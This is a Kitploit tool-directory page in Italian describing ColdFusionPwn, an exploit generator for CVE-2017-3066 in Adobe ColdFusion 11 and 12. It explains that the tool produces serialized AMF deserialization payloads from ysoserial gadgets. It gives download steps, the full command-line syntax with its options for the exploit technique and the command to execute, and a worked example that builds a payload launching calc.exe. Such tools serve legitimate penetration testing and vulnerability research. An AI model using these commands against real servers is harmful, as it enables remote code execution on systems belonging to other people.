Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
ColdFusionPwn — Strumento di exploit per CVE-2017-3066 che mira ad Adobe Coldfusion 11/12 | Kitploit
Strumenti/GitHubGitHub/codewhitesec/coldfusionpwn
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubcodewhitesec/coldfusionpwn

ColdFusionPwn

Strumento di exploit per CVE-2017-3066 che mira ad Adobe Coldfusion 11/12

Vedi Repository
95293 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

ColdFusionPwn

Strumento di sfruttamento per CVE-2017-3066 che mira ad Adobe ColdFusion 11/12.

Descrizione

Lo strumento consente di generare payload AMF serializzati per sfruttare la mancata convalida dell'input delle classi consentite. Per i dettagli, vedi il nostro post del blog.

Installazione

Scarica l'ultima versione di ysoserial. Scarica ColdFusionPwn dalle release.

Utilizzo

root@kitploit:~
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner [-s|-e] [payload type] '[command]' [outfile]
root@kitploit:~
- [-s|-e]         Setter (CF11) or Externalizable Exploit (CF11/12) technique
- [payload type]  ysoserial gadget payload 
- [command]       command to be executed
- [outfile]       output file for the generated payload

È necessario avere ColdFusionPwn-0.0.1-SNAPSHOT-all.jar come prima voce nel classpath, poiché la libreria ApacheCommons BeanUtils inclusa in ysoserial è più recente (e ha una serialversion uid diversa).

Esempi

root@kitploit:~
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 calc.exe /tmp/out.amf
Scarica lo strumento